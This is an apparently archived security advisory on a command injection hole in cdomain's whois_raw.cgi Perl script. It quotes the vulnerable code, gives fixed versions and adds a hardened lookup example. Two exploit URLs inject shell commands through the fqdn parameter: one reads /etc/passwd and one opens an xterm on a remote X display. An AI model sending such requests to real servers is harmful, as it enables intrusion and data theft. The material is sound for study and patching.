COMMAND

    whois.cgi (whois_raw.cgi)

SYSTEMS AFFECTED

    Those using cdomain 1.x and 2.x up to and including 2.4

PROBLEM

    Salvatore Sanfilippo -antirez- found the following. There is a
    problem in whois_raw.cgi, called from whois.cgi. whois_raw.cgi is
    part of cdomain v1.0.

        #!/usr/bin/perl
        #
        # whois_raw.cgi  Written by J. Allen Hatch (zone@berkshire.net)
        # 04/17/97
        #
        # This script is part of the cdomain v1.0 package which is available at:
        #       http://www.your-site.com/~zone/whois.html

        ...

        require ("/usr/lib/perl5/cgi-lib.pl");

        ...

        $fqdn = $in{'fqdn'};
        # Fetch the root name and concatenate
        # Fire off whois
        if ($in{'root'} eq "it") {
                @result=`$whois_cmd_it $fqdn`;
        } elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
                @result="Dettagli non disponibili per il dominio richiesto.";
        } else {
                @result=`$whois_cmd $fqdn`;
        }

        ...

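    The exploit is banal and the problem is well known: the fqdn
    parameter is interpolated unchecked into a backtick command, so a
    URL-encoded newline (%0A) followed by a command makes the shell
    run it: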

        http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
        http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

    cdomain-free 2.4 and lower are vulnerable.

SOLUTION

    The commercial version (the one that runs on NT too) is _not_
    vulnerable since it does its own socket handling instead of
    starting 'whois'. cdomain-free 2.5 and all commercial cdomain
    versions seen are _not_ vulnerable, because they connect to the
    whois servers themselves. cdomain-free is available for download
    at www.cdomain.com.
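
    For sites that must keep calling an external whois client, a
    hardened form of the lookup follows as an added example (not
    cdomain's code and not part of the original advisory): it validates
    fqdn against a strict hostname pattern and runs the client through
    Perl's list-form open, which never invokes a shell. The whois path,
    the function names and the sample inputs are assumptions.

```perl
#!/usr/bin/perl
# Added example, not cdomain code: safe handling of the fqdn parameter.
use strict;
use warnings;

# Assumption: location of the whois client (the original keeps it in $whois_cmd).
my $WHOIS = '/usr/bin/whois';

# Accept only dot-separated hostname labels, 253 characters at most.
# \A and \z anchor the whole string; $ would still match before a final newline.
sub valid_fqdn {
    my ($name) = @_;
    return 0 unless defined $name && length($name) <= 253;
    return $name =~ /\A(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}\z/ ? 1 : 0;
}

# Run a program from an argument vector. The list form of open() execs the
# program directly, so no shell parses the arguments.
sub run_argv {
    my (@argv) = @_;
    open(my $fh, '-|', @argv) or die "cannot run $argv[0]: $!";
    my @out = <$fh>;
    close($fh);
    return @out;
}

# Replacement for the backtick calls: validate, then exec without a shell.
# A valid name starts with a letter or digit, so it cannot be read as an option.
sub whois_lookup {
    my ($fqdn) = @_;
    return ("Invalid domain name.\n") unless valid_fqdn($fqdn);
    return run_argv($WHOIS, $fqdn);
}

# Constructed inputs: two ordinary names, the decoded fqdn value from the
# advisory's first URL (%0A is a newline), and a name with a trailing newline.
for my $input ('example.com', 'www.example.org', "\ncat /etc/passwd", "example.com\n") {
    (my $shown = $input) =~ s/\n/\\n/g;
    printf "%-22s %s\n", "'$shown'", valid_fqdn($input) ? 'accepted' : 'rejected';
}

# Second layer: even unvalidated text reaches the child as one literal argument.
# $^X (the running perl) stands in for whois so that this demo runs offline.
my @seen = run_argv($^X, '-e', 'print scalar(@ARGV)', "x\ncat /etc/passwd");
print "arguments seen by child: @seen\n";
```

    The two ordinary names are accepted and both newline-bearing values
    are rejected; the final line reports a single argument, showing that
    the newline never reaches a shell.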